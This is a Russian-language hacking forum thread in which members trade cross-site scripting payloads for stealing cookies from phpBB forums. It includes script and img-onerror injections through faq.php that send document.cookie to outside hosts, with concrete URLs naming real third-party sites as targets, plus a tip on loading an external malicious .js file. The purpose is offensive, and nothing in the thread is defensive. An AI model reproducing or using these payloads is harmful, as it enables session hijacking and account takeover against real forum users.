Кто рубит в xss!

Решил попробовать взломать свой форум на phpBB с помощью xss-уязвимости (для sql-баги, нужно чтобы была возможность пересылать приваты, а это есть не везде). Долго мучался, но так нефига и не получилось. Если вводить так(брал любую описанную xss-багу):<script&gt;document.location=&quot;www.asd.as/as.php?xack=&quot;+document.cookie&lt;/script&gt;, то скрипт добавляет слеши перед каждой ковычкой. А если так (в 10'ой кодировке):<script&gt;document.location&amp;#61&amp;#34www.asd.as/as.php?xack&amp;#61&amp;#34&amp;#43document.cookie&lt;/script&gt;, то строка выполняется только до &quot;<script&gt;document.location=&quot; и соответственно нарушается синтаксиc штмл, и весь остальной код не воспроизводится. Объясните где логика?
PS Кто нибудь слышал про движок textus? Есть ли там уязвимости?

 

Я что-то не понял, каким образом ты вставляешь этот скрипт в форум ?

 

Вот так:
http://www.[target].ty/faq.php....1]=test

 

Вот так работает

http://www.spb-mebel.ru/phpbb/faq.php?faq[0][0]=te):<img src="" sss=http://antichat.ru/cgi-bin/s.jpg? onerror=document.location=this.sss%2Bdocument.cookie>st&amp;faq[0][1]=test

 

а в каких версиях PHPbb это работает?
вот тут: www.rimspb.ru/forum/ например не пашет...

 

в разных...

http://forum.jamer.net/faq.php....]=Pengo

 

Куда этот пингвин пропал.... Наверно обиделся что я его рэпером называл =)))

 

А при чём тут он??????

 

Мне его так не хватает... ...

 

Я тоже с этим мучился - без кавычек - кукисы не спереть =(
я решил это так:
Просто выполнялся скрипт не из url'а, а из файла faq[0][0]=<script src=\localhost/bad.js></script>